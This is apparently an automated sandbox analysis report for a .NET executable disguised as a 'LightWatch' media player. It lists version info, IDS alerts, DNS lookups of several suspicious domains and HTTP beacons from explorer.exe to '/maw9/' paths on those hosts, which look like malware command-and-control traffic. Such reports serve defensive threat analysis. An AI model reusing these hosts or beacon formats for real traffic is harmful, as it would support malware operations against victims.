Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xb6090 | 0x38c | PGP symmetric key encrypted data - Plaintext or unencrypted data | |
RT_MANIFEST | 0xb642c | 0xa85 | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators | |

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2018
Assembly Version | 1.0.0.0
InternalName | TOKENPRIMARYGROUP.exe
FileVersion | 1.0.1.35
CompanyName | Unguest
LegalTrademarks | Unguest
Comments | A light media player
ProductName | LightWatch
ProductVersion | 1.0.1.35
FileDescription | LightWatch
OriginalFilename | TOKENPRIMARYGROUP.exe

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/03/21-14:52:13.170221 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:52:13.208071 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 84.17.52.126 | 192.168.2.6
05/03/21-14:52:13.208862 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:52:13.243956 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 149.11.89.129 | 192.168.2.6
05/03/21-14:52:13.245145 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:52:13.284303 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 130.117.50.25 | 192.168.2.6
05/03/21-14:52:13.285192 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:52:13.326276 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 130.117.0.62 | 192.168.2.6
05/03/21-14:52:13.327004 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:52:13.373769 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 154.54.36.253 | 192.168.2.6
05/03/21-14:52:13.374138 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:52:13.420985 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 154.54.37.30 | 192.168.2.6
05/03/21-14:52:13.423338 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:52:17.216262 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:52:21.221518 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:52:25.217066 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:52:29.445869 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:52:33.218240 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:52:33.262544 | ICMP | 449 | ICMP Time-To-Live Exceeded in Transit | | | 4.69.163.33 | 192.168.2.6
05/03/21-14:52:33.263052 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:52:37.218445 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:52:41.217783 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:52:45.219410 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:52:49.218385 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:52:53.220185 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:52:57.218909 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:53:01.219208 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:53:05.219924 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:53:09.220096 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:53:13.220160 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:53:17.221426 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:53:21.221815 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:53:25.221377 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:53:29.221725 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:53:33.255775 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:53:37.226355 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:53:41.222918 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:53:41.302735 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49754 | 34.102.136.180 | 192.168.2.6
05/03/21-14:53:45.223564 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:53:49.223311 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:53:53.223679 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:53:57.224332 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:54:01.236118 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:54:02.995352 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49762 | 34.102.136.180 | 192.168.2.6
05/03/21-14:54:05.232558 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:54:09.237107 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:54:13.233310 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:54:17.233252 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:54:21.233525 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:54:25.233831 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254
05/03/21-14:54:29.234762 | ICMP | 384 | ICMP PING | | | 192.168.2.6 | 8.241.89.254

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 3, 2021 14:53:41.123671055 CEST | 49754 | 80 | 192.168.2.6 | 34.102.136.180
May 3, 2021 14:53:41.164711952 CEST | 80 | 49754 | 34.102.136.180 | 192.168.2.6
May 3, 2021 14:53:41.164901972 CEST | 49754 | 80 | 192.168.2.6 | 34.102.136.180
May 3, 2021 14:53:41.165328026 CEST | 49754 | 80 | 192.168.2.6 | 34.102.136.180
May 3, 2021 14:53:41.206484079 CEST | 80 | 49754 | 34.102.136.180 | 192.168.2.6
May 3, 2021 14:53:41.302735090 CEST | 80 | 49754 | 34.102.136.180 | 192.168.2.6
May 3, 2021 14:53:41.302769899 CEST | 80 | 49754 | 34.102.136.180 | 192.168.2.6
May 3, 2021 14:53:41.303035021 CEST | 49754 | 80 | 192.168.2.6 | 34.102.136.180
May 3, 2021 14:53:41.303069115 CEST | 49754 | 80 | 192.168.2.6 | 34.102.136.180
May 3, 2021 14:53:41.344063044 CEST | 80 | 49754 | 34.102.136.180 | 192.168.2.6
May 3, 2021 14:53:46.635814905 CEST | 49757 | 80 | 192.168.2.6 | 202.254.234.152
May 3, 2021 14:53:46.949348927 CEST | 80 | 49757 | 202.254.234.152 | 192.168.2.6
May 3, 2021 14:53:46.949485064 CEST | 49757 | 80 | 192.168.2.6 | 202.254.234.152
May 3, 2021 14:53:46.949692011 CEST | 49757 | 80 | 192.168.2.6 | 202.254.234.152
May 3, 2021 14:53:47.263036013 CEST | 80 | 49757 | 202.254.234.152 | 192.168.2.6
May 3, 2021 14:53:47.265083075 CEST | 80 | 49757 | 202.254.234.152 | 192.168.2.6
May 3, 2021 14:53:47.265172958 CEST | 80 | 49757 | 202.254.234.152 | 192.168.2.6
May 3, 2021 14:53:47.265407085 CEST | 49757 | 80 | 192.168.2.6 | 202.254.234.152
May 3, 2021 14:53:47.265433073 CEST | 49757 | 80 | 192.168.2.6 | 202.254.234.152
May 3, 2021 14:53:47.578778028 CEST | 80 | 49757 | 202.254.234.152 | 192.168.2.6
May 3, 2021 14:53:52.445022106 CEST | 49760 | 80 | 192.168.2.6 | 181.214.142.2
May 3, 2021 14:53:52.576229095 CEST | 80 | 49760 | 181.214.142.2 | 192.168.2.6
May 3, 2021 14:53:52.576344967 CEST | 49760 | 80 | 192.168.2.6 | 181.214.142.2
May 3, 2021 14:53:52.576576948 CEST | 49760 | 80 | 192.168.2.6 | 181.214.142.2
May 3, 2021 14:53:52.707530022 CEST | 80 | 49760 | 181.214.142.2 | 192.168.2.6
May 3, 2021 14:53:52.709163904 CEST | 80 | 49760 | 181.214.142.2 | 192.168.2.6
May 3, 2021 14:53:52.709183931 CEST | 80 | 49760 | 181.214.142.2 | 192.168.2.6
May 3, 2021 14:53:52.709220886 CEST | 80 | 49760 | 181.214.142.2 | 192.168.2.6
May 3, 2021 14:53:52.709239006 CEST | 80 | 49760 | 181.214.142.2 | 192.168.2.6
May 3, 2021 14:53:52.709256887 CEST | 80 | 49760 | 181.214.142.2 | 192.168.2.6
May 3, 2021 14:53:52.709278107 CEST | 80 | 49760 | 181.214.142.2 | 192.168.2.6
May 3, 2021 14:53:52.709296942 CEST | 80 | 49760 | 181.214.142.2 | 192.168.2.6
May 3, 2021 14:53:52.709311962 CEST | 80 | 49760 | 181.214.142.2 | 192.168.2.6
May 3, 2021 14:53:52.709326029 CEST | 80 | 49760 | 181.214.142.2 | 192.168.2.6
May 3, 2021 14:53:52.709336996 CEST | 49760 | 80 | 192.168.2.6 | 181.214.142.2
May 3, 2021 14:53:52.709460020 CEST | 49760 | 80 | 192.168.2.6 | 181.214.142.2
May 3, 2021 14:53:52.709512949 CEST | 49760 | 80 | 192.168.2.6 | 181.214.142.2
May 3, 2021 14:53:52.842205048 CEST | 80 | 49760 | 181.214.142.2 | 192.168.2.6
May 3, 2021 14:54:02.815330029 CEST | 49762 | 80 | 192.168.2.6 | 34.102.136.180
May 3, 2021 14:54:02.856976986 CEST | 80 | 49762 | 34.102.136.180 | 192.168.2.6
May 3, 2021 14:54:02.857342958 CEST | 49762 | 80 | 192.168.2.6 | 34.102.136.180
May 3, 2021 14:54:02.857573986 CEST | 49762 | 80 | 192.168.2.6 | 34.102.136.180
May 3, 2021 14:54:02.898530960 CEST | 80 | 49762 | 34.102.136.180 | 192.168.2.6
May 3, 2021 14:54:02.995352030 CEST | 80 | 49762 | 34.102.136.180 | 192.168.2.6
May 3, 2021 14:54:02.995368958 CEST | 80 | 49762 | 34.102.136.180 | 192.168.2.6
May 3, 2021 14:54:02.996453047 CEST | 49762 | 80 | 192.168.2.6 | 34.102.136.180
May 3, 2021 14:54:02.996651888 CEST | 49762 | 80 | 192.168.2.6 | 34.102.136.180
May 3, 2021 14:54:03.038955927 CEST | 80 | 49762 | 34.102.136.180 | 192.168.2.6
May 3, 2021 14:54:13.178071022 CEST | 49763 | 80 | 192.168.2.6 | 107.180.57.119
May 3, 2021 14:54:13.310555935 CEST | 80 | 49763 | 107.180.57.119 | 192.168.2.6
May 3, 2021 14:54:13.310719013 CEST | 49763 | 80 | 192.168.2.6 | 107.180.57.119
May 3, 2021 14:54:13.310914993 CEST | 49763 | 80 | 192.168.2.6 | 107.180.57.119
May 3, 2021 14:54:13.442984104 CEST | 80 | 49763 | 107.180.57.119 | 192.168.2.6
May 3, 2021 14:54:13.470249891 CEST | 80 | 49763 | 107.180.57.119 | 192.168.2.6
May 3, 2021 14:54:13.470271111 CEST | 80 | 49763 | 107.180.57.119 | 192.168.2.6
May 3, 2021 14:54:13.470285892 CEST | 80 | 49763 | 107.180.57.119 | 192.168.2.6
May 3, 2021 14:54:13.470494986 CEST | 49763 | 80 | 192.168.2.6 | 107.180.57.119
May 3, 2021 14:54:13.470557928 CEST | 49763 | 80 | 192.168.2.6 | 107.180.57.119
May 3, 2021 14:54:13.602511883 CEST | 80 | 49763 | 107.180.57.119 | 192.168.2.6

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 3, 2021 14:52:06.801609993 CEST | 51774 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:06.850207090 CEST | 53 | 51774 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:52:07.866614103 CEST | 56023 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:07.917653084 CEST | 53 | 56023 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:52:09.031147957 CEST | 58384 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:09.085213900 CEST | 53 | 58384 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:52:10.104856014 CEST | 60261 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:10.164602041 CEST | 53 | 60261 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:52:11.426073074 CEST | 56061 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:11.474884033 CEST | 53 | 56061 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:52:12.578313112 CEST | 58336 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:12.627011061 CEST | 53 | 58336 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:52:13.094438076 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:13.169132948 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:52:13.644759893 CEST | 54064 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:13.694717884 CEST | 53 | 54064 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:52:14.624813080 CEST | 52811 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:14.676548004 CEST | 53 | 52811 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:52:16.291661024 CEST | 55299 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:16.343203068 CEST | 53 | 55299 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:52:17.243180037 CEST | 63745 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:17.300841093 CEST | 53 | 63745 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:52:18.206481934 CEST | 50055 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:18.255245924 CEST | 53 | 50055 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:52:19.370393038 CEST | 61374 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:19.419213057 CEST | 53 | 61374 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:52:20.784404039 CEST | 50339 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:20.833194017 CEST | 53 | 50339 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:52:21.732249975 CEST | 63307 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:21.781076908 CEST | 53 | 63307 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:52:22.957520008 CEST | 49694 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:23.006467104 CEST | 53 | 49694 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:52:24.825062990 CEST | 54982 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:24.873651981 CEST | 53 | 54982 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:52:25.944996119 CEST | 50010 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:25.997683048 CEST | 53 | 50010 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:52:39.021899939 CEST | 63718 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:39.070730925 CEST | 53 | 63718 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:52:43.575400114 CEST | 62116 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:52:43.628989935 CEST | 53 | 62116 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:53:02.776420116 CEST | 63816 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:53:02.835649014 CEST | 53 | 63816 | 8.8.8.8 | 192.168.2.6
May 3, 2021 14:53:09.870780945 CEST | 55014 | 53 | 192.168.2.6 | 8.8.8.8
May 3, 2021 14:53:10.079027891 CEST | 53 | 55014 | 8.8.8.8 | 192.168.2.6
                                                                    May 3, 2021 14:53:10.188205957 CEST6220853192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:10.256165028 CEST53622088.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:11.570303917 CEST5757453192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:11.623312950 CEST53575748.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:12.723320961 CEST5181853192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:12.848351955 CEST53518188.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:13.611901045 CEST5662853192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:13.724877119 CEST53566288.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:15.156788111 CEST6077853192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:15.214942932 CEST53607788.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:16.745594978 CEST5379953192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:16.805594921 CEST5468353192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:16.806613922 CEST53537998.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:16.865751982 CEST53546838.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:17.709784985 CEST5932953192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:17.852190971 CEST53593298.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:20.214184046 CEST6402153192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:20.266258001 CEST53640218.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:22.851625919 CEST5612953192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:22.910708904 CEST53561298.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:23.646487951 CEST5817753192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:23.703864098 CEST53581778.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:41.036803007 CEST5070053192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:41.099087954 CEST53507008.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:46.320147038 CEST5406953192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:46.609731913 CEST6117853192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:46.634038925 CEST53540698.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:46.644306898 CEST5701753192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:46.668921947 CEST53611788.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:46.693243027 CEST53570178.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:52.274975061 CEST5632753192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:52.444093943 CEST53563278.8.8.8192.168.2.6
                                                                    May 3, 2021 14:53:53.144257069 CEST5024353192.168.2.68.8.8.8
                                                                    May 3, 2021 14:53:53.218609095 CEST53502438.8.8.8192.168.2.6
                                                                    May 3, 2021 14:54:02.750222921 CEST6205553192.168.2.68.8.8.8
                                                                    May 3, 2021 14:54:02.814151049 CEST53620558.8.8.8192.168.2.6
                                                                    May 3, 2021 14:54:08.005501032 CEST6124953192.168.2.68.8.8.8
                                                                    May 3, 2021 14:54:08.063040972 CEST53612498.8.8.8192.168.2.6
                                                                    May 3, 2021 14:54:13.094579935 CEST6525253192.168.2.68.8.8.8
                                                                    May 3, 2021 14:54:13.176599026 CEST53652528.8.8.8192.168.2.6
                                                                    May 3, 2021 14:54:18.493829966 CEST6436753192.168.2.68.8.8.8
                                                                    May 3, 2021 14:54:18.563572884 CEST53643678.8.8.8192.168.2.6
                                                                    May 3, 2021 14:54:23.578939915 CEST5506653192.168.2.68.8.8.8
                                                                    May 3, 2021 14:54:23.788476944 CEST53550668.8.8.8192.168.2.6
                                                                    May 3, 2021 14:54:29.500647068 CEST6021153192.168.2.68.8.8.8
                                                                    May 3, 2021 14:54:29.579925060 CEST53602118.8.8.8192.168.2.6

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 3, 2021 14:53:41.036803007 CEST | 192.168.2.6 | 8.8.8.8 | 0x58cd | Standard query (0) | www.dinkoistmatrimony.com | A (IP address) | IN (0x0001)
May 3, 2021 14:53:46.320147038 CEST | 192.168.2.6 | 8.8.8.8 | 0xcbad | Standard query (0) | www.premier-moment.info | A (IP address) | IN (0x0001)
May 3, 2021 14:53:52.274975061 CEST | 192.168.2.6 | 8.8.8.8 | 0x53de | Standard query (0) | www.ecosanhn.com | A (IP address) | IN (0x0001)
May 3, 2021 14:54:02.750222921 CEST | 192.168.2.6 | 8.8.8.8 | 0xd3c6 | Standard query (0) | www.curvygirlholiday.com | A (IP address) | IN (0x0001)
May 3, 2021 14:54:08.005501032 CEST | 192.168.2.6 | 8.8.8.8 | 0x4030 | Standard query (0) | www.vipbrandwatch.info | A (IP address) | IN (0x0001)
May 3, 2021 14:54:13.094579935 CEST | 192.168.2.6 | 8.8.8.8 | 0xd69b | Standard query (0) | www.networkingmaderas.com | A (IP address) | IN (0x0001)
May 3, 2021 14:54:18.493829966 CEST | 192.168.2.6 | 8.8.8.8 | 0x230d | Standard query (0) | www.beachrockisland.com | A (IP address) | IN (0x0001)
May 3, 2021 14:54:23.578939915 CEST | 192.168.2.6 | 8.8.8.8 | 0x847e | Standard query (0) | www.itechfreak.com | A (IP address) | IN (0x0001)
May 3, 2021 14:54:29.500647068 CEST | 192.168.2.6 | 8.8.8.8 | 0x704c | Standard query (0) | www.jaimericart.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 3, 2021 14:53:41.099087954 CEST | 8.8.8.8 | 192.168.2.6 | 0x58cd | No error (0) | www.dinkoistmatrimony.com | dinkoistmatrimony.com | | CNAME (Canonical name) | IN (0x0001)
May 3, 2021 14:53:41.099087954 CEST | 8.8.8.8 | 192.168.2.6 | 0x58cd | No error (0) | dinkoistmatrimony.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
May 3, 2021 14:53:46.634038925 CEST | 8.8.8.8 | 192.168.2.6 | 0xcbad | No error (0) | www.premier-moment.info | | 202.254.234.152 | A (IP address) | IN (0x0001)
May 3, 2021 14:53:52.444093943 CEST | 8.8.8.8 | 192.168.2.6 | 0x53de | No error (0) | www.ecosanhn.com | ecosanhn.com | | CNAME (Canonical name) | IN (0x0001)
May 3, 2021 14:53:52.444093943 CEST | 8.8.8.8 | 192.168.2.6 | 0x53de | No error (0) | ecosanhn.com | | 181.214.142.2 | A (IP address) | IN (0x0001)
May 3, 2021 14:54:02.814151049 CEST | 8.8.8.8 | 192.168.2.6 | 0xd3c6 | No error (0) | www.curvygirlholiday.com | curvygirlholiday.com | | CNAME (Canonical name) | IN (0x0001)
May 3, 2021 14:54:02.814151049 CEST | 8.8.8.8 | 192.168.2.6 | 0xd3c6 | No error (0) | curvygirlholiday.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
May 3, 2021 14:54:08.063040972 CEST | 8.8.8.8 | 192.168.2.6 | 0x4030 | Name error (3) | www.vipbrandwatch.info | none | none | A (IP address) | IN (0x0001)
May 3, 2021 14:54:13.176599026 CEST | 8.8.8.8 | 192.168.2.6 | 0xd69b | No error (0) | www.networkingmaderas.com | networkingmaderas.com | | CNAME (Canonical name) | IN (0x0001)
May 3, 2021 14:54:13.176599026 CEST | 8.8.8.8 | 192.168.2.6 | 0xd69b | No error (0) | networkingmaderas.com | | 107.180.57.119 | A (IP address) | IN (0x0001)
May 3, 2021 14:54:18.563572884 CEST | 8.8.8.8 | 192.168.2.6 | 0x230d | Name error (3) | www.beachrockisland.com | none | none | A (IP address) | IN (0x0001)
May 3, 2021 14:54:23.788476944 CEST | 8.8.8.8 | 192.168.2.6 | 0x847e | No error (0) | www.itechfreak.com | | 192.238.144.41 | A (IP address) | IN (0x0001)
May 3, 2021 14:54:29.579925060 CEST | 8.8.8.8 | 192.168.2.6 | 0x704c | No error (0) | www.jaimericart.com | jaimericart.com | | CNAME (Canonical name) | IN (0x0001)
May 3, 2021 14:54:29.579925060 CEST | 8.8.8.8 | 192.168.2.6 | 0x704c | No error (0) | jaimericart.com | | 81.88.48.71 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.dinkoistmatrimony.com
• www.premier-moment.info
• www.ecosanhn.com
• www.curvygirlholiday.com
• www.networkingmaderas.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49754 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 3, 2021 14:53:41.165328026 CEST | 10311 | OUT | GET /maw9/?AVF=4eDAg+VUuFTPb+HpMV2XwHXrAkW6c8A/v4D4zAieFew51h9R0F5m+f+tz7m/68XBKeAB57yd0w==&6l=sHbLpdw8x0Nx4 HTTP/1.1
Host: www.dinkoistmatrimony.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 3, 2021 14:53:41.302735090 CEST | 10311 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 03 May 2021 12:53:41 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6089be8c-113"
Via: 1.1 google
Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49757 | 202.254.234.152 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 3, 2021 14:53:46.949692011 CEST | 11185 | OUT | GET /maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4 HTTP/1.1
Host: www.premier-moment.info
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 3, 2021 14:53:47.265083075 CEST | 11191 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 03 May 2021 12:53:47 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 347
Connection: close
Location: https://www.premier-moment.info/maw9/?AVF=6+c9WwA91vc3q1qPV/bxdb4jLCwfrBo6mkGAjXedmMMeaWqNVTNOJ33lEW7rMTYT0EzxW77dCg==&6l=sHbLpdw8x0Nx4
